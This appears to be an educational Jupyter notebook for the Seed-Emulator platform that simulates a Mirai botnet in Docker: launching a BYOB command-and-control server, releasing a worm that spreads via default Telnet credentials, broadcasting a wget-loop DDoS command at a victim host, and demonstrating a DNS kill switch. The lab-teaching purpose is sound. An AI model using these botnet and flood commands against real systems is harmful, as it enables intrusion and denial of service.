# Example: Mirai Botnet Attack Simulation

This Notebook aims to demonstrate how to use the Seed-Emulator platform to replicate the core behaviors of the Mirai botnet. Through interactive code cells, you will be guided step-by-step through the entire process, from building the environment and propagating the worm to launching a DDoS attack and triggering the kill switch.

### About the Mirai Malware
Mirai is an infamous piece of malware that primarily infects Internet of Things (IoT) devices, assembling them into a massive, remotely controlled botnet. Its main propagation method is by scanning the internet for devices with open Telnet ports that are still using factory default credentials. Once a device is infected, it becomes part of the botnet (a "bot") and follows commands from a Command & Control (C2) server to launch large-scale Distributed Denial of Service (DDoS) attacks.

### Demonstration Overview
This example will guide you through the following key steps:
1.  **Build the Simulation Environment**: Automatically compile and launch a mini-internet environment containing multiple Autonomous Systems (ASes), routers, and hosts.
2.  **Build the Botnet**: Start the C2 server and release the worm script, observing its automatic propagation and infection process via weak password scanning in the simulated network.
3.  **Launch a DDoS Attack**: Control all infected bots to launch a traffic attack against a target website.
4.  **Observe the Attack's Effect**: Visually assess the impact of the DDoS attack on the web service's performance through browser access and a network topology map.
5.  **Trigger the DNS Kill Switch**: Demonstrate the DNS "kill switch" mechanism designed in Mirai and observe how it terminates the worm's further propagation.

## Step 1: Environment Preparation and Compilation

Before you begin, please ensure that **Docker** and **Python 3** are installed on your system. This Notebook relies on the `!` command to execute shell scripts.

First, let's confirm that the project file structure is complete. The following command will display the structure of the current directory.

In [ ]:
!tree -L 2

**Expected Output**: You should see a directory structure similar to the one below, containing all the necessary `.py` and `.sh` script files.
```
.
├── container_files
│   ├── mirai-base
│   └── z_build.sh
├── dns_component.py
├── mini_internet_for_mirai.py
├── mirai_internet_with_dns.py
├── mirai.py
├── misc
│   └── index.html
├── README.md
└── scripts
    ├── add_dns_record.sh
    ├── start_c2_server.sh
    ├── start_com-a_server.sh
    └── start_victim_host.sh
```
---
Next, run the main script `mirai_internet_with_dns.py`. This script will invoke the core functionalities of Seed-Emulator to compile the defined network topology, hosts, and services into a set of Docker Compose configuration files. This process is expected to take several seconds.

In [ ]:
print("Compiling the simulation environment, please wait...")
!python3 mirai_internet_with_dns.py
print("Compilation complete. The output/ directory has been generated.")

## Step 2: Launching the Simulation Environment

After compilation, we will launch the simulation environment in two steps: first, build the Docker images, and then start all the containers. Building the images for the first time may take several minutes.

In [ ]:
print("Building Docker images... (this may take a while on the first run)")
!cd output && DOCKER_BUILDKIT=0 docker compose build
print("Image build complete.")

In [ ]:
print("Starting all containers in the background...")
!cd output && docker compose up -d
print("All containers have been started successfully.")

### Visualizing the Network Topology

The simulation environment provides a web-based visualization interface for real-time monitoring of the network topology and data flow.

Please open the following address in your web browser: [http://localhost:8080/map.html](http://localhost:8080/map.html)

Through this interactive map, you can visually observe the worm's propagation path and the traffic flow of the DDoS attack in the subsequent steps.

## Step 3: Building the Botnet

With the environment deployed, it's time to begin the core steps of the attack simulation. First, we will start the Command & Control (C2) server, and then release the worm to act as "patient zero" and begin infecting the network.

### 3.1 Start the C2 Server (BYOB)

The C2 server is the control center of the botnet, used to receive connections from bots and issue commands. This example uses the open-source tool **BYOB (Build Your Own Botnet)** as the C2 framework.

**Note: Manual action required**
This step requires an interactive terminal to run the BYOB console. Please **open a new local terminal window** and execute the following command to enter the C2 server's shell:

```bash
# Run in a new local terminal:
./scripts/start_c2_server.sh
```

After entering the C2 server's shell, execute the following command to start the BYOB server:

```bash
# Run in the C2 server's shell:
cd /tmp/byob/byob/
python3 server.py --port 445
```

When you see the BYOB welcome screen, it means the C2 server is running successfully and is listening for connections. **Please keep this terminal window open**. You can type `sessions` in this window at any time to view the list of connected bots.

### 3.2 Release the Worm and Observe Propagation

Once the C2 service is ready, the worm can be released. We will start from the C2 server itself by running the `mirai.py` script. It will act as the first infected node, scanning the network for other devices with weak Telnet credentials and implanting copies of itself.

**Preparation for Observation**: To clearly observe the propagation process, please first go to the [network map](http://localhost:8080/map.html) and enter `dst 10.170.0.100` in the filter box, then press Enter. This will highlight all traffic directed to the C2 server (IP: `10.170.0.100`).

Now, execute the code cell below to start the worm.

In [ ]:
print("Releasing the 'mirai.py' worm on the C2 server...")
c2_container_id = !docker ps -f "name=C2_server" -q
if c2_container_id:
    !docker exec -d {c2_container_id[0]} sh -c 'cd /var/www/html/ && python3 mirai.py > /tmp/mirai_worm.log 2>&1'
    print("The worm is now running in the background and will begin to scan and infect other hosts in the network.")
else:
    print("Error: Could not find the C2_server container.")

### 3.3 Observing the Propagation Process

After executing the previous step, the worm has started to spread. Please switch to the browser window with the [network map](http://localhost:8080/map.html) to observe.

You will see a continuous stream of new nodes initiating connections to the C2 server, which indicates that these nodes are downloading the `mirai.py` worm script. The traffic dynamics of the entire propagation process will be visually presented before you.

Meanwhile, in the terminal where you are running BYOB, you will see new session connection messages appearing. Once the network is fully infected, the total number of sessions will exceed 90, which can serve as a reference for the propagation progress.

## Step 4: Launching the DDoS Attack

After a period of propagation, our botnet has reached a considerable size. Next, we will leverage these bots to launch an application-layer DDoS attack against the target website (`host_victim`, IP: `10.170.0.99`).

### 4.1 Prepare a Large File for the Attack and Access the Victim Website

To make the attack's effects more observable, we will have all bots repeatedly download a large file or a large video to exhaust the victim's bandwidth. Please ensure that a large file named `image.png` (e.g., larger than 10MB) and a large video names `video.mp4`(e.g., larger than 500MB) exists in the `misc/` directory.

You can prepare these files in one of the following ways:

**Option 1: Use your own file**
Place a large image and a large video in the `misc/` directory and rename it to `image.png`, `video.mp4`.

**Option 2: Generate a file using ImageMagick**
If you have ImageMagick installed on your system, you can run the following command to generate an image of about 60MB. If it's not installed, you can install it using `sudo apt-get update && sudo apt-get install imagemagick` (for Debian/Ubuntu) or the corresponding package manager for your system.

In [ ]:
print("Generating a 4000x3000 sample image file...")
!convert -size 4000x3000 plasma:fractal misc/image.png
print("File 'misc/image.png' has been generated.")
!ls -lh misc/image.png

Once the file is ready, let's first access the victim website under normal conditions. Port 80 of the website has been mapped to port **8888** on your local machine.


Please click the link to open it in a new browser tab: [http://localhost:8888/index.html](http://localhost:8888/index.html) / [http://localhost:8888/video.mp4](http://localhost:8888/video.mp4)

Under normal circumstances, the large image or the large video on the page should load smoothly. You can refresh it a few times to get a feel for its normal loading speed.

### 4.2 Issuing the Attack Command

Now, switch to the terminal window where you are running the **BYOB console**, type the following command, and press Enter. This command will be broadcast to all online bots.

if you want to attack the image service:
```bash
# Enter this command in the BYOB console:
broadcast timeout 30s sh -c 'while true; do wget --no-cache -q -O /dev/null http://10.170.0.99/image.png; done'
```

or you want to attack the video service:
```bash
broadcast timeout 40s sh -c 'while true; do wget --no-cache -q -O /dev/null http://10.170.0.99/video.mp4; done'
```

**Command Parameter Breakdown**: 
- `broadcast`: A built-in BYOB command to send the subsequent instruction to all connected bots.
- `timeout 30s`: A safety feature that instructs the bots to automatically stop the task after 10 seconds, preventing the command from running indefinitely.
- `sh -c '...'`: Executes the following string as a shell command on the bot.
- `while true; do ...; done`: An infinite loop to make the download action continuous.
- `wget --no-cache -q -O /dev/null ...`: Uses `wget` to download the file. `--no-cache` attempts to bypass caches, `-q` enables quiet mode, and `-O /dev/null` discards the downloaded content without saving it to disk, thus only generating network traffic.


### 4.3 Observing the Attack's Effect

After issuing the attack command, you can observe its effects in the following ways:

#### **For image service:**

**Method 1: Refresh During the Attack**
Immediately after sending the command, switch to the victim website's browser page ([http://localhost:8888/index.html](http://localhost:8888/index.html)) and perform a **hard refresh** (usually `Ctrl+Shift+R` or `Cmd+Shift+R`). You will notice that the page loading speed slows down significantly, the image may fail to display completely, or the request may even time out. This indicates that the traffic generated by the bots has successfully consumed the server's bandwidth and processing capacity.

**Method 2: Before and After Comparison**
First, issue the attack command, wait a few seconds, and then open the victim's website in a new browser tab. You may find that the page fails to load at all during the 10-second attack period. Once the `timeout` is reached and the attack stops, refreshing the page again will show that the service has returned to normal.

#### **For video service:**
Immediately after sending the command, switch to the video page, you will see it can't play at all because the download channel is exhausted by our bot hosts.


**Observe on the Visualization Map**
At the same time, on the [network map](http://localhost:8080/map.html), set the filter to `dst 10.170.0.99`. You will see a large volume of packets flocking from various bot nodes to the victim host, forming a dense traffic storm.

## Step 5: Demonstrating the DNS Kill Switch

The Mirai's DNS kill-switch mechanism can only be observed while the worm is **actively propagating**. Therefore, to demonstrate this feature, we need to reset the simulation environment and trigger it mid-propagation.

### 5.1 Reset the Environment
First, run the following cell to shut down and clean up the currently running environment.

In [ ]:
print("Shutting down and cleaning up the current environment...")
!cd output && docker compose down
print("Environment has been cleaned up.")

### 5.2 Restart and Re-release the Worm

The environment has been reset. Now, please **go back and re-execute the following steps** in this Notebook:

1.  **Step 2**: Restart the simulation environment (`docker compose up -d`).
2.  **Step 3.1**: In a new terminal, restart the C2 server (`python3 server.py ...`).
3.  **Step 3.2**: Re-release the worm (`docker exec ... mirai.py`).

### 5.3 Trigger the Kill Switch Mid-Propagation

After completing the restart steps above, closely monitor the number of sessions in the BYOB console. When the session count grows to an intermediate value (e.g., 30-50, indicating the worm is still actively spreading), immediately perform the following actions to trigger the kill switch.

**Note: Manual action required**
Please **open another new local terminal window** and execute the command below to enter the shell of the `.com` top-level domain DNS server:

```bash
# Run in a new local terminal:
./scripts/start_com-a_server.sh
```

After entering the DNS server's shell, run the pre-configured script to register the `killswitch.com` domain:

```bash
# Run in the .com DNS server's shell:
cd /tmp
./add_dns_record.sh killswitch.com
```
This script will automatically modify the BIND9 DNS server's configuration, add an A record for `killswitch.com`, and reload the service.

### 5.4 Observing the Effect

After the domain is registered, the `mirai.py` worm instances still propagating in the network will, upon their next DNS query (which occurs periodically, about every 10 seconds), discover that `killswitch.com` can be successfully resolved. At this point, they will trigger their built-in self-destruction logic and terminate their propagation behavior.

The most direct way to observe this is by **watching the BYOB console**: you will notice that shortly after triggering the kill switch, the **number of sessions stops increasing**, even if there are still uninfected hosts in the network. This demonstrates that the kill switch has successfully halted the worm's further spread.

## Step 6: Cleaning Up the Environment

At this point, all demonstrations are complete. To free up system resources, please run the command below to shut down and remove all related Docker containers and networks.

In [ ]:
print("Shutting down and cleaning up all simulation containers...")
!cd output && docker compose down
print("Cleanup complete.")